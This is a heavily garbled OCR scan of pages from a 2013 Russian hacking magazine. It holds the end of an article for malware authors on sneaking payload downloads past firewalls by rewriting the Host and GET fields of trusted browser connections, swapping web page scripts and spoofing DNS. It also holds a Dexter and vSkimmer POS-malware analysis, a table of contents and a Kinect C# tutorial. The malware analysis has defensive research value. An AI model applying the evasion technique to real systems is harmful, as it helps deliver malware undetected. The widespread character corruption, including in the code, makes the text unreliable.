ный. И в роли догоняющего всегда остаются 
антивирусы. Обход файрволов не исключение. 
Например, когда малварь лет этак пять назад 
начала плавно перемещаться в ядро системы, 
встал вопрос о сетевом управлении зверушка- 
ми непосредственно из ядра. Это можно было 
сделать двумя способами, предоставленными 
сетевой инфраструктурой самой операционной 
системы: ТЭІ и N013. 

На тот момент, когда умельцы выложили 
способы создания нового сетевого соединения 
из ядра посредством ТОІ, мало какой из файр- 
волов умел это отслеживать. Надо признать, 
что столь уж широкого распространения в мал- 
вари эта технология не получила — она довольно 
сложна и для ее реализации программеру нужен 
значительный опыт кодинга и отладки в ядре. 

Однако со временем файры научились отсле- 
живать сетевые соединения, созданные на уров- 
не ТЭ1 (такое сетевое соединение будет выглядеть 
как установленное от имени процесса Зузіепл). 
Что уж тут поделаешь, пришлось кулхацкерам 
лезть на уровень сетевой карты — N013 и пытать- 
ся манипулировать сетью оттуда. Но это уже был 
высший пилотаж, и распространения в малвари 
это не получило, хотя, если честно, ничего прин- 
ципиально сложного там нет. Я видел пару ра- 
ботающих вариантов установления соединения 
и контроля за ним с уровня N0^3, рассчитанных 
на управление некоей прикладной программой, 
однако сложность этих вариантов была сопоста- 
вима с уровнем среднего файрвола. 



Для разработчиков файрволов же технологии 
ЫЭІЗ оказались райским подарком — возможно- 
стей для контроля сетевых соединений там уйма, 
даже без необходимости перехвата основных 
ЫЭІЗ-функций. 

Тем более что файрвол, реализованный 
на уровне N013, позволяет контролировать 
все сетевые соединения, и глубже уже некуда 
(ну, если не принимать во внимание закладки 
в ЕЕРРЮМ сетевой карты). 

Вдобавок отмечу, что с появлением техно- 
логии РаІсІіСиагс} возможность перехвата се- 
тевых функций в ядре практически скатилась 
к нулю (РаІсбСиагсГом защищены файлы пйіз.зуз 
и Ісрір.зуз). 

ТУ ПИ К? НЕТ, НАЧАЛ О! 

Что остается делать честному малварщику? 

Честному малварщику только и, остается, 
что грустно вздыхать и надеяться на успешный 
инжект в какой-либо доверенный процесс или 
ждать появления новшеств, позволяющих защи- 
щать свои управляющие серверы от блокировки 
файрволами. 

И все-таки решение проблемы обхода файр- 
волов есть. Красивое, элегантное и, самое 
главное, простое до одури (готов поспорить 
на то вино, которое ты обещал мне прислать, 
что ты гонишь насчет простоты. - - Прим. ред.}. 
И заключается оно в том, что разработчики мал- 
вари его тупо не видят, да простят они меня, 
грешного пьяницу. 

Как-то давным-давно, лет так пять назад, си- 
дел я за компом, пил «Ахтамар» и эксперименти- 
ровал с редиректом сетевых соединений в ядре, 
разрабатывая небольшой ТОІ-Ьазесі драйвер 
(редирект по сути своей заключается в простой 
смене ІР-адреса сетевого пакета). В процессе 
экспериментов я пытался перенаправить се- 
тевой пакет, направленный браузером на веб- 
сервер зйеі.ххх, на другой сайт — ■ зі1:е2.ххх. 
С крайним для себя удивлением, граничившим 
с полным о[сепзогеб]ванием, я обнаружил, что, 
несмотря на подтвержденную смену айпишника 
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ІЫРО 

У Криса Касперски в его 
книге «Записки иссле- 
дователя компьютер- 
ных в и русов » ( которая , 
правда, изрядно 
потрепана временем 
и современными техно- 
логиями) есть глава, по- 
священная поведению 
файрволов в различных 
ситуациях и методам их 
преодоления. Можно 
даже прочесть. 

Рабочие исходники 
у меня есть. Не проси, 
я жадный :). 

А купить -денег 
не хватит;). 



ѴѴігезГіагк за работой 



пакета, пакет почему-то возвращался с первона- 
чального веб-сервера зііеі.ххх. И только потом 
мою тупую голову осенило: пакет и в самом деле 
уходил на 5іІе2.ххх, и ключевым здесь оказалось 
именно то, что я посылал пакет на стандартный 
веб-сервер, которых в Сети миллионы. 

Веб-сервер зііеі .ххх повел себя совершенно 
восхитительно — он принял пакет, переслал его 
на зіІе2.ххх и результаты вернул мне! В процессе 
дальнейших изысканий обнаружилось, что так 
ведут себя 99,9% всех веб-серверов! 

ИТАК, СЛ ЕДИ ЗА РУКОЙ... 

Как выглядит стандартный сетевой запрос брау- 
зера? Примерно вот так: 

Ч5ЕТ /раее.Ыт ! НТТР /1 . 1\г\п" 

" Но зѣ : з и р е г Ііозѣ . г и \г\п " 

_!|ІІ5ег-А§еп1:і_ МогіІІа/Б.Ѳ (XII: и : — 

1_і пих І686 ; ги; гѵ:1.9Ь5) 

Сеско/2008050509 Гіг е^ОХ/З.Ѳ Ь 5 \г\п" 

"Ассерііі ѣех ѣ/Іт ЬтІ ,*-■ 

аррІісаѣіоп/хІгСтІ+хпіІ .♦-< 

арр!ісаі:іоп/хпі1 :д= Ѳ. 9. */* ;д= Ѳ .8\г\п" 

" Ассер1> 1ап§иаёеі_ ги ,, егь из ^ 

д=0.7 1 е п;д=0. 3\г\п“ 

"Ассер'С-СІіаг5еІ:і_ міпсіоц5-1251. иІ^-8 ;<-■ 
д=0. 7 Г * :д=0. 7" 

“Кее р-АІіѵе: 300\г\гГ 

"СоппесЫоп : кеер-а1іѵе\г\п" 

^\г\п”; 

Более подробную спецификацию всех полей 
стандартных запросов СЕТ/РОЗТ ты сможешь 
найти в Сети. 

Так вот, ІР-адрес нужен фактически только 
для отправки пакета, самому веб-серверу он аб- 
солютно неинтересен, сервер висит на 80-м пор- 
ту и тупо анализирует весь сетевой поток, кото- 
рый приходит на этот порт. 

Его интересуют прежде всего два поля: Нозі 
и то, что идет после СЕТ. Веб-сервер, в случае 
если поле Нозі отличается от его «родного», сра- 
ботает как прозрачный прокси, перенаправив 
сетевой пакет по указанному хосту, получит от- 
вет и вернет его обратно нам! 

В поле Нозі можно, кстати, указывать просто 
нужный ІР-адрес, без имени хоста. 

Итак, подведу промежуточный итог: что- 
бы средиректить сетевой пакет на нужный нам 
ІР-адрес и скачать зверушку, изменять сам ІР- 
адрес пакета не надо! 



Достаточно просто изменить поле Нозі 
на нужное и подправить поле СЕТ, типа «"СЕТ / 
рарказѵігизот/ѵішз.ехе НТТР/1 .1\г\п"». И файры 
на это покупаются, как дешевые портовые самые 
знаете кто :). 

Как это происходит? Да очень просто — ■ 
файрволу глубоко фиолетово, что там в полях 
сетевого запроса написано. 99% сетевых соеди- 
нений — это сетевые шняги браузера, торрен- 
тов, менеджеров закачек, обновлений системы, 
которые то и дело что-то там СЕТ’ят. 

СЕТ! СЕТ! СЕТ! Таких запросов — тысячи, мы 
их просто не видим, потому что на стандартной 
новостной странице какого-то среднего сайта 
браузеру нужно закачать десятки картинок, ги- 
фок, анимации, скриптов и прочей фигни, о за- 
качке которой нас никто не спрашивает. 

Все, что интересует файрвол в данном слу- 
чае (доверенного соединения), — какой ІР-адрес 
у пакета, чтобы сверить его с черным списком. 
Но так как сам !Р мы оставляем в неприкосно- 
венности, в итоге получаем потрясающую воз- 
можность скачивать то, что нам надо, с любого 
другого ІР: тупой веб-сервер сам скачает все, 
что угодно. 

СОБИРАЕМ ВСЕ ВМЕСТЕ 

Итак, чтобы собрать всю картину воедино, нужно 
немногое — возможность просматривать и кор- 
ректировать имеющиеся законные (доверен- 
ные) соединения. Недалекость доморощенных 
малварщиков, как я уже писал выше, заклю- 
чается в том, что они почему-то думают, будто 
для скачки бота на комп обязательно нужно но- 
вое соединение. 

НЕ НУЖНО, в том-то и дело! Достаточно ти- 
хонечко сидеть где-то в системе, парсить но- 
вые контакты и при отлове выгодного для нас, 
то бишь 100%-но доверенного соединения под- 
менить поле Нозі, скачать с какого-то левого 
адреса по описанной выше технике зловред 
и запустить его на исполнение. Как я уже гово- 
рил, ни один файр на такую хитрость не покупа- 
ется! 

Вся прелесть этой техники — в ее простоте 
и доступности. Посему и горюют недоделанные 
мал варщики, которые все снова и снова пыта- 
ются найти новый, неизвестный способ уста- 
новления нового сетевого соединения. Не надо 
ничего устанавливать, если все уже готово! 
Надо только взглянуть на проблему с другой 
стороны. 



ЗАКАЧКА СКРИПТОВ И БИНАРНИКОВ 

Это вообще праздник. Суть в том, что сегодня 
практически на каждой интерактивной странице 
есть веб-скрипты. Что стоит отследить момент на- 
чала его скачки и подменить «законный» скачива- 
емый скрипт своим? В том-то и дело, что ничего! 
Невинный веб-сервер это легко позволит! Напри- 
мер, возьмем те же самые социальные сети, где 
зависает треть населения планеты Земля Сол- 
нечной системы, что в галактике Млечный Путь. 
Скриптов на страницах — мама не горюй, и каж- 
дый из них можно скомпрометировать! Вариант 
сигнатурного детекта не пройдет — скрипт (или 
тот же самый бинарник) может быть зашифрован. 
Делайте выводы, господа! 

РП05&С0Ы8, 

ИЛИ ВМЕСТО ЗАКЛЮЧЕН ИЯ 

Техника довольно непростая (ты проспорил, она 
таки непростая. — Прим, ред.), скажем прямо, 
она требует хорошего знания ТСР/ІР-стека и се- 
тевого программирования. Однако абсолютно 
рабочая, что могу засвидетельствовать лично. 
Выходов в такой ситуации для файров два. Во- 
первых, для доверенных соединений контроли- 
ровать соответствие ІР-адреса и соответствие 
доменного имени в поле Нозіданному ІР-адресу. 
Однако это очень трудозатратно и чревато силь- 
ными тормозами, потому что покаааааааа та- 
аааааам РІЧЗ проверим, покаааа тааааам с ІР- 
адресом сверим... 

При активной сетевой деятельности 
и при включенном файрволе ты получишь такие 
дикие тормоза, каких свет не видывал. 

Для полноты картины — чтобы «обезопасить» 
0143-запросы аверов для реализации своих не- 
хороших планов, если есть доступ к ядру, вполне 
можно осуществить подмену ОМЗ-выдачи. В ре- 
зультате файр при попытке определить положи- 
тельную корреляцию ІР-адреса и РЕМЗ-запроса 
вполне может впасть в прострацию, что можно 
легко использовать в своих злобных планах. 

Засим закончу. Удачного компилирования 
и да пребудет с тобой Сила! СЕ 

ѴѴАІШШС 

Вся информация предоставлена исключительно в озна- 
комительных целях. Ни редакция, ни автор не несут от- 
ветственности за любой возможный вред, причиненный 
материалами данной статьи. 
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АНАЛИЗИРУЕМ МАЛВАРЬ 
ДЛЯ РОЗ-ТЕРМИНАЛОВ 



Авторы малвари не стоят на месте, 
а постоянно выдумывают новые схе- 
мы для пополнения своих кошельков. 
В этой статье мы рассмотрим новый 
тренд в сфере вирусописатель- 
ства — вредоносное ПО для Р05- 
терминалов. 



ЧТО ТАКОЕ РОЗ-ТЕРМИНАЛ? 

РОЗ переводится как точка продажи (роіпі оТ заіе), то есть место, где клиент рас- 
плачивается за товар или услуги. РОЗ-терминалы представляют собой широкий 
класс устройств, и реализация его зависит только от фантазии производите- 
лей. К примеру, существуют РОЗ-терминалы, созданные на базе планшета іРасІ. 
Пока вирусописатели для РОЗ-терминалов освоили только одну платформу — 
ѴѴІпсІоѵѵе, так что речь в данной статье пойдет о вредоносном ПО именно для нее. 

Чем же интересны РОЗ-терминалы злоумышленникам? Ответ прост — эквай- 
рингом, то есть оплатой пластиковой картой. Несмотря на то что стандарты без- 
опасности данных индустрии платежных карт запрещают хранить полные данные 
карты после успешной транзакции, вирусописатели все же нашли способ полу- 
чить их в свои руки. Дело в том, что для авторизации покупки РОЗ-терминалу 
необходимо каким-либо образом связаться с процессинговым центром, а все 
это время данные карты находятся в памяти РОЗ-терминала. Этим и решили 
воспользоваться злоумышленники. Еще раз повторюсь, что реализаций РОЗ- 
терминалов огромное множество, и данная атака будет успешна не на всех 
устройствах. 

Злоумышленников интересуют Ігаскі и 1гаск2 — данные, записанные на маг- 
нитную ленту. В этих данных содержатся имя владельца, код карты, срок окон- 
чания и прочая интимная информация. Обладание 1гаск1Дгаск2 достаточно 
для того, чтобы изготовить клон пластиковой карты. 










ХАКЕР 06 /173/ 2013 



Р05-терминалы под атакой 
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Функция поиска данных карты в декомпилированном виде Поиск 1гаск2 с помощью регулярного выражения 



ОЕХТЕП 

В декабре 2012 года израильская компания ЗесиіеП сообщила 
о новой вредоносной программе, обнаруженной ею на сотнях 
РОЗ-систем в различных странах мира. Одна из интересных 
подробностей — среди зараженных систем оказалось свыше 
30% серверных версий ОС ѴѴіпсІоѵѵз. Эта компания предостав- 
ляет облачный сервис, помогающий выявить вредоносную 
активность в сети предприятия, анализируя лог-файлы, соз- 
данные различными программными или аппаратными прок- 
си-серверами (ВІие Соаі, Зциісі и другими). Неудивительно, 
что именно она первой обнаружила эту угрозу: д оо.д І/КТ \г. 

Рассмотрим файлы, хеши которых опубликовала ЗесиІегС 
Файлы запакованы довольно популярным криптором, который 
в процессе распаковки использует сигнатуру ХРХАХСХК. Этот 
крилтор широко применяется для сокрытия от сигнатурного 
детекта. А поэтому и изучен он тоже неплохо, для него даже 
написан статический распаковщик: аоо.оІ/СРІ іР . 

Впрочем, для распаковки вручную достаточно поставить 
брейкпоинт на МіпАРІ-функции ѴігІиаІАІІос и протрейсить код 
до тех пор, пока в одном из выделенных регионов памяти 
не окажется распакованный РЕ-файл. 

После снятия криптора мы обнаружим, что три из четырех 
файлов полностью идентичны. Размер первого варианта со- 
ставляет всего 24 Кб, файл скомпилирован с помощью ѴізиаІ 
Зіисііо, дата компиляции 30 августа 2012 года, согласно дан- 
ным из РЕ-заголовка. Второй, более поздний вариант скомпи- 
лирован 16 октября 2012 года, а его размер 44 Кб. 

Теперь поближе к самому функционалу. Первым де- 
лом Эехіег пытается внедрить свое тело и создать поток 
в процессе Іпіегпеі; Ехріогег. Далее вредонос копирует себя 
в %АРРйАТА%, используя случайное имя, а также прописыва- 
ется в ключе реестра для автозагрузки. Эехіег запускает свои 
потоки, которые отвечают за сохранность ключа автозапуска 
в реестре, поиск данных и внедрение в процесс ІЕ. В заключе- 
ние управление передается коду, устанавливающему соеди- 
нение и передающему собранные данные на сервер. 

Для связи с сервером Рехіег использует НТТР-протокол, 
данные передаются с помощью РОЗТ-запроса. Прежде чем 
отправить данные на сервер, Эехіег шифрует их с помощью 
ХОВ-операции и алгоритма Ьазе64. На сервер посылается 
следующая информация: 



ТАК ЛИ НОВЫ ИДЕИ 
ЭТИХ ВИРУСОВ? 



Несмотря на весь шум, поднятый 
в СМИ и интернете в начале 2013 
года, похожая схема атаки была 
продемонстрирована в 2010 году 
сотрудниками компании Тгизіѵѵаѵе 
на конференции ЭЕР СОИ 18. В сво- 
ем докладе «Маіѵѵаге Ргеакзбоѵу 2» 
сотрудники Тгизіѵѵаѵе продемон- 
стрировали малварь, способную 
извлекать из памяти приложений 
1гаск1Дгаск2. Слайды презентации 
доступны по ссылке доо.дІ/ѵЫтМ . 





■ ѴѴтс)оѵѵ5 ХР 

■ ѴѴіпсіоѵѵб Ноте Зегѵег 
и ѴѴіпсіО’.ѵб Зегѵег 2003 

■ ѴѴ:псіоѵ/5 7 

Я ѴѴІпсіоѵѵб 2000 

■ ѴѴіпсІоѵѵ5 Зегѵе г В 2 

■ ѴѴіпсіоѵѵб Ѵіаіа 

■ МЛпсісаѵз Зегѵег 2008 
Кпкпо«т 



Статистика ОС, зараженных Оехіег, по версии 8есиІегі 




9$ 



МаІУігаге 



ХАКЕР 06 /173/ 2013 



• раде — идентификатор бота; 

• итр — собранные Ігаск-данные; 

• ипт — имя пользователя; 

• опт — имя компьютера; 

• чиегу — версия операционной системы; 

• грее — «битность» операционной системы (32 ѵз 64); 

• орі — время, прошедшее от предыдущего ввода пользователем инфор- 
мации. Получено с помощью ѴѴіпАРІ-функции СеІІ_аз ІІпріДіпІо; 

• ѵіеш — список всех процессов, запущенных на зараженной системе; 

• ѵаг — уникальная строка для каждого билда; 

• ѵаі — случайная строка, используется как ключ для расшифровки. 

На этот РОЗТ-запрос сервер высылает ответ, в хидере которого содер- 
жатся соокіе с командой на выполнение для клиента. Команда зашифрована 
тем же алгоритмом, что и запрос. Ранняя версия йехіег поддерживает всего 
две команды: 

• сРіескіп — установка периода задержки между запросами к серверу; 

• зсапіп — установка периода задержки между попытками найти Ігаск- 
данные в памяти. 

В поздней версии к этим двум командам были добавлены еще три: 

• ирсіаіе — обновление с указанного ІІВІ_; 

• ипіпаіаіі — удаление себя с зараженного компьютера; 

• сіоѵѵпіоасі — скачивание и запуск файла с указанного в команде 11Н1_. 

В целом Рехіег обладает классическим набором функционала для тро- 
янца. Единственное, что делает его уникальным среди множества похожих 
вредоносных программ, — это направленность на кражу данных о пластико- 
вых картах. Поиск 1гаск2 идет по такой последовательности: 

1. Составляется список процессов. Из списка исключаются системные 
и 64-битные процессы. 

2. С помощью ѴѴіпАРІ-функции ѴігІиаЮиегуЕх проверяется доступность ре- 
гионов памяти. 

3. Происходит попытка чтения памяти из доступных регионов с помощью 
ѴѴіпАРІ-функции ВеасІРгосеззМетогу. 

4. В прочитанном буфере ищется символ =, а также проверяется, чтобы 
справа и слева от символа была строка определенной длины, состоя- 
щая из цифр. Учитывается возможность хранения строки как в АЫЗІ, так 
и в Упісосіе. 

5. Цифры слева от символа = проверяются с помощью алгоритма Луна. 
Если проверка пройдена, данные копируются в специальный буфер, от- 
куда позже будут посланы на сервер. 

6. Через определенный период все шаги повторяются, данный период мо- 
жет быть задан командой с сервера. 

В более поздней версии Рехіег поиск Ігаскі ведется по схожему алгоритму. 

Ѵ8КІММЕК 

Эту малварь принято считать последователем Оехіег. В ѵЗкіттег добави- 
ли простой антидебаг, выполненный посредством стандартных ѴѴІпАРІ- 
функций, и запись своего собственного процесса в доверенные процессы 
ѴѴІпсіоѵ/з-файрвола. 

ѴЗкіттег ищет процессы примерно по такому же алгоритму, что и Оехіег, 
только автор не стал изобретать велосипед и для поиска использовал регу- 
лярные выражения. 

Однако помимо всего прочего есть в ѵЗкіттег и интересный функцио- 
нал. Очевидно, что основная трудность для злоумышленников — заразить 
компьютер, который используется в РОЗ-терминале. С такого компьютера 
обычно не ходят по сайтам, а иногда на нем и вовсе нет интернета. В таком 
случае заразить компьютер можно с помощью инсайдера в организации. 
Именно такой режим работы был добавлен в ѵЗкіттег. Если у зараженного 
компьютера отсутствует интернет-соединение, то все накопленные данные 
вредонос записывает в специальный файл. Когда же к компьютеру подклю- 
чается ІІЗВ- накопитель с меткой тома КАПТОХА007, то ѵЗкіттег копирует 
всю собранную информацию на накопитель в файл сітрг.Іод. 

У автора данной малвари хорошее чувство юмора — видимо, этим 
можно объяснить, что в качестве Цзег-Адепі’а при подключению к серверу 
используется значение РСЮотрІіапІ/3.33. РСІ Сотрііапі; — именно так на- 
зывают терминал, который полностью соответствует стандартам безопас- 
ности данных индустрии платежных карт. 

ЗАКЛЮЧЕНИЕ 

Несмотря на свою примитивность, рассмотренные вредоносные програм- 
мы успешно справляются с возложенными на них задачами. Однако в буду- 
щем мы можем стать свидетелями использования более изощренного ПО, 
направленного на хищение данных с РОЗ-терминалов. ОЕ 
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□ехііег отправляет зашифрованные данные на сервер 
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ѵЗкіттег проверяет метку тома у диска 



ИСТОРИЯ УСПЕХА 



В мае 2011 года было выдвинуто официальное обвинение четырем граж- 
данам Румынии в том, что они похищали данные о пластиковых картах 
жителей США, используя РОЗ-терминалы. Согласно обвинению, с 2008 
года по май 2011 -го румынские злоумышленники проникли на более 
чем 150 РОЗ-терминалов одной из сетей ресторанов быстрого питания, 
а также на РОЗ-терминалы других компаний. Всего хакерам удалось 
похитить более 80 тысяч данных о пластиковых картах. Для того чтобы 
установить свое вредоносное ПО на РОЗ-терминалы, хакеры подбирали 
пароли к рсАпуѵѵііеге — программе, использующейся для удаленного 
управления компьютером. 



Ргеѵіеѵѵ 



РАЗДЕЛЯЙ И УПРАВЛЯЙ! 



Программно-конфигурируемые сети (ЗОІЧ) — ин- 
тересная концепция, которая грозится изменить 
рынок сетевого оборудования и ПО, наконец-то 
освободив системных администраторов от гнета 
Сізсо и других вендоров. Кроме того, в рамках 
этой идеологии появляется множество новых 
инструментов для тестирования, мониторинга 
и построения сетей. Хотя герой нашего интервью 
Пол Мокапетрис считает эту затею тупиковой — 
мол, не нужно ломать то, что работает. Прав ли 
он? Давай разберемся. 





кодинг 




ТАМ, ЗА ГОРИЗОНТОМ 

Первое знакомство с новым инструментом 
ѴМѵѵаге Ногігоп, с помощью которого можно 
централизовать и унифицировать приложения 
компании. 



СТРАЖИ КОРПОРАТИВНОГО ПОКОЯ 

Самый надежный способ защититься от несанк- 
ционированного физического доступа — крип- 
тография. Однако организовать такую систему 
в масштабах предприятия — задача не из про- 
стых. 



КОДИНГ ПОД КШЕСТ 

В прошлой статье мы окунулись в фундаменталь 
ные основы Кинекта. Сейчас поговорим о самых 
мощных и востребованных функциях — распоз- 
навании скелета и слежении за ним. 



ПО 



ЧЫІХОЮ 





II N1X010 





ПО ТЕРНИСТЫМ ТРОПАМ 

Изучаем самые интересные, значимые и пер- 
спективные достижения создателей дистрибути- 
вов І_іпих за последнее время. 



НАШ ОТВЕТ БЛОГЕРАМ 

Развенчиваем главные мифы о І_іпих, порож- 
денные постами самопровозглашенных «гуру» 
из блогосферы. 



ДОМАШНИЙ КОМПАКТ 

Маленькие однозадачные компы — важный тренд 
последнего времени. Рассматриваем лучшие 
мультимедийные неттопы. 
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ЧАСТЬ 




Получение и обработка данных о скелете и жестах 

После того как в прошлой статье мы окунулись в фундаментальные основы 

Кинекта, настала пора обсудить более сложные вещи. В числе самых мощных 
и востребованных функций Кинекта — распознавание скелета и слежение за 
ним. Благодаря им этот контроллер и стал настолько популярным. Эта функ- 
циональность не только пригодится для управления игровыми аниматами, 
но и служит многим практическим целям: в медицине и образовании, для соз- 
дания интерфейса между человеком и различными механизмами, для дистан- 
ционного управления компьютером, оповещения о движении и тому подобное 




Юрий «уигетЬо» Язев 

Ведущий программист 
компании СепошеСатез 

шт.рдепот.ги, 

уагеѵзоШадтаіІ.сот 




середине весны МісгозоН порадовала 
разработчиков очередными версия- 
ми КіпесІІогѴѴіпсІошз ЗРК и Кіпесііог 
\Л/іпсІо\л/Б Тооікгі. Оба продукта получи- 
ли номера 1.7. Обновления в первом 
значительными не назовешь, а вот второй вклю- 
чает существенное количество нововведений. 
Из наиболее интересных стоит выделить: обнов- 
ленную систему взаимодействия и добавленный 
модуль Кіпесі: Ризіоп. О последнем, как более 
значимом, читай во врезке. Первый представляет 
собой расширенные средства взаимодействия 
с элементами пользовательского интерфейса, 
как то нажатие и скроллинг. Между тем сегодня 
мы обратим внимание на другую, более значи- 
тельную тематику. 



РАСПОЗНАВАНИЕ СКЕЛЕТА 

Четвертым потоком Кинекта условно можно на- 
звать получаемые данные о костях и суставах. 
Хотя «потоком» эти данные называются с натяж- 
кой, в АРІ для Кинекта они представлены именно 
так. С помощью данных из потока глубины Кіпесі 
ЗЭК распознает шесть гуманоидных существ, 
но скелеты строит для двух из них {не спеши 
делать выводы об ориентированности Кинекта 
на инопланетные рынки. — Прим. ред.}. У осталь- 
ных он отмечает только центр тяжести (находится 
в тазу, см. рис. 1). Это позволяет существенно 
сэкономить вычислительные ресурсы, поскольку 
при построении модели скелета на процессор 
хостовой машины ложится большая нагрузка. 
Определяется гуманоидное тело по трехэтапно- 



му алгоритму. На первом этапе выбирается объ- 
ект подходящих размеров, затем в этом объекте 
с помощью метода сравнения ищутся составля- 
ющие: голова, туловище, верхние, нижние конеч- 
ности. Больше, увы, не дано. Сравнивает Кинект 
с заранее определенными данными, которым 
он «обучен» (см. предыдущую статью). На втором 
этапе с помощью «дерева выбора» происходит 
сегментация выбранного на предыдущем шаге 
объекта-тела. Сегменты также представляют со- 
бой заранее оп ределе н н ы е и з ш и ро ко го диапазо- 
на данные. На последнем, третьем этапе детекти- 
рования тела программное обеспечение сенсора, 
опираясь на сегментную разметку, определяет 
позиции суставов. Наконец, чтобы вычислить 
специфичные для конкретного тела координаты, 





Кинект проецирует изображение с трех сторон: 
спереди, слева и сверху. Это позволяет получить 
точное представление. После определения тела 
ПО Кинекта переходит к слежению за его переме- 
щением. Как мы помним из предыдущей статьи, 
программное обеспечение Кинекта распознает 
19 костей, соединенных 20 суставами. Имеется 
возможность определения сидящего гуманои- 
да, в таком случае количество костей и суставов 
уменьшается в два раза: из внимания Кинекта 
убирается часть тела ниже пояса и спина. 

На следующем шаге мы разработаем про- 
грамму, которая будет строить связанный скелет 
для одного человека, находящегося в режиме 
Зіапб 11р. Мне не удалось привлечь на это ме- 
роприятие еще одного (кроме себя) гуманоида 
для построения второго скелета, поэтому ограни- 
чимся одним. Суть программы довольно проста: 
получив из потока данные о суставах, разместить 
фигуры, представляющие их, в соответствующих 
местах на выводимом изображении. После этого 
надо связать суставы линиями для получения ко- 
стей. Взгляни на рис. 1, чтобы увидеть карту ске- 
лета с обозначенными суставами. Обрати внима- 
ние, скелет находится в зеркальном отражении. 

Неспешно начнем сооружать приложение. 
В ѴізиаІ Зіибіо 2010 создай новый С#-проект, ис- 
пользующий ѴѴРР для графического вывода. На- 
зови его, к примеру, ВопезРгашег. По задумке, 
этот «рисователь костей» (ого, перевод фирмы 
«Фаргус» детектед! — Прим, ред.) будет вы- 
водить на канву изображение из видеопотока, 
а при определении персонажа в кадре наклады- 
вать на него скелет. В ХАМІ_-файл добавь такой 
код, не забудь перед этим увеличить границы 
формы: 

<51:аскРапе1> 

кВігііоп М ате = "ирВи і 1:оп" <-■ 

Соп1:еігЬ=" вверх" РопІіБіге^'^Ѳ" 
С1іск="щрВиі:'Ьоп_С1іск"></Ви1:'Ьоп> 
<Сапѵаз Мате="туСапуа5" НеіеИ~Ь="480" <-■ 
НісІ*Ь=”640" /> 

<Ви1:1:оп Мате="боыпВи1:1:оп‘' «-< 

Соп1:еп±="вниз'|_Роп'1:5І2е= , '20" 

С 1і с к= " сі оып Виіі: о п_С1 і с к " > < / В иіі: о п > 
</5“ЕаскРапе 1> 

Здесь в контейнер ЗіаскРапеІ помещают- 
ся две кнопки и канва. Кнопки пригодятся нам 
для регулирования угла обзора Кинекта (чтобы 
освежить воспоминания, загляни в предыдущую 
статью). Для возможности работы с Кинектом 
добавь в проект динамическую либу МісгозоН. 
Кіпесі. 611, а в код ссылку на пространство имен: 
изіпд МісгозоИ Кіпесі;. Так как мы обсуждали ра- 




Рис. 2. Наша прога в действии 



боту с видеопотоком в прошлой статье, я не буду 
повторяться; инициализация потока данных ске- 
лета эквивалентна инициализации видеопотока. 
Объявим в начале класса необходимые объекты, 
это: собственно объект Кинекта; байтовый мас- 
сив для хранения цветных пикселей, полученных 
с сенсора; объект-изображение, на котором бу- 
дем рисовать до вывода на канву, и объект клас- 
са Зкеіеіоп, он будет хранить все получаемые 
из потока скелета данные о суставах и их рас- 
положении. В событии загрузки формы, помимо 
определения подключенного сенсора, запуска 
видеопотока и регистрации события, происхо- 
дящего во время получения очередного кадра, 
мы также должны включить поток с данными о ко- 
стях и зарегистрировать событие, возникающее 
при получении фрейма с данными о скелете. До- 
полни событие следующими строчками (перед 
стартом Кинекта): 

кіпесі: . БкеІеіопБѣгеат . ЕпаЬ1е() ; 
кІпесЕ . БкеІеіопРгатеКеабу += пеы 
ЕуепіНапб1ег<5ке1еіопРгатеНеабуЕѵеп1:Аг§з><± 
(кіпесі: БкеІеіопРгатеКеаб у) ; 

В отличие от разработанного в прошлой статье 
приложения для вывода видеопотока, в текущем 
приложении на форме нет объекта Ітаде, в каче- 
стве значения свойства Зоигсе которого для выво- 
да изображения на экран мы могли использовать 
объект класса ѴѴгіІеаЫеВіІтар с заранее сформи- 
рованным рисунком из данных, полученных с Ки- 
некга. Зато на форме есть канва. Ее можно «за- 
красить» этими данными. Так и сделаем: отличие 
содержимого события кіпес1_СоІогРгатеР!еас1у 
заключается только в последней строчке (если 
ты следишь за развитием событий с прошлой 
статьи; если же нет, поднимай исходник с диска), 
замени ее на такую: туСапѵаз.ВаскдгоипсІ = пеѵі/ 
ІтадеВгизІп(ЬіІтар);. Тут при каждой перерисовке 
для закраски фона канвы мы используем кисть, 
сформированную из битмапа. 

Теперь мы плавно переходим к реализации 
события кіпесіЗкеІеІопРгаплеВеабу. Подобно 
аналогичным событиям, которые возбужда- 
ются при получении очередных кадров видео- 
потока и потока глубины, данное событие сра- 
батывает по приходу фрейма со сведениями 
о «костях». Для экономии журнального простран- 
ства я не буду приводить весь код, ограничусь на- 
водящими надело мыслями, а исходник, как всег- 
да, ждет твоего внимания на диске. 

Чтобы избавиться от содержимого, нарисо- 
ванного во время предыдущего возбуждения со- 
бытия, очищаем канву. Затем, объявив массив 
данных скелета, в конструкции изіпд забираем 
из потока пришедший фрейм (ЗкеІеІопРгате) — 
срез действительных данных о костях. Каждый 
фрейм содержит от нуля (в таком случае ни один 
скелет не распознан) до шести объектов клас- 
са Зкеіеіоп, каждый из которых содержит дан- 
ные о суставах (боіпі), обернутые в коллекции 
боіпіСоІІесІіоп. Каждый сустав может быть в од- 
ном из трех режимов: Тгаскеб (то есть видимый 
для Кинекта), N 01 Тгаскеб (невидимый), Іпіеггеб 
(о позиции данного сустава ПО Кинекта «догады- 
вается», вычисляя предполагаемое положение). 
Кроме того, каждый сустав имеет свою позицию 
в трехмерном пространстве, центр данной си- 
стемы координат располагается в Кинекте. От- 
сюда отдаляемые от Кинекта объекты получают 
увеличивающиеся координаты по оси 2, тогда 
как перемещаемые вправо (относительно Ки- 
некта) получают возрастающие координаты по X, 
а вверх — по У Получив фрейм скелета, мы попа- 
даем внутрь командных скобок метода, где пер- 




Рис. 1 . Скелет стоящего и сидящего гуманоида 

вым делом проверяем полученные данные. Да- 
лее инициализируем объявленный ранее массив 
костей константой ЗкеІе1опАггауЕ_епд1Н, которая 
равна шести (как мы помним, это максимальное 
количество распознаваемых тел). Затем с помо- 
щью метода СоруЗкеІеІопОаІаТо в этот массив 
помещаем данные о скелетах из фрейма. Про- 
верим этот массив на неравенство пиІІ. После 
этого следует ключевая конструкция события, где 
с помощью имО-оператора происходит выбор 
первого видимого (Тгаскеб) скелета из массива 
скелетов. В целом скелеты, подобно суставам, 
имеют три состояния: видимый — Тгаскеб, не- 
видимый — N 01 Тгаскеб и Розіііоп Опіу — опре- 
делена только позиция для скелетов с индексами 
2-5 (счет с нуля). Когда скелет выбран, он будет 
помещен в глобальную переменную зкеіеіоп; по- 
следним действием следует вызов нашего мето- 
да ОгаѵѵЗкеІеІоп, ему в качестве параметра этот 
самый скелет и передается. 

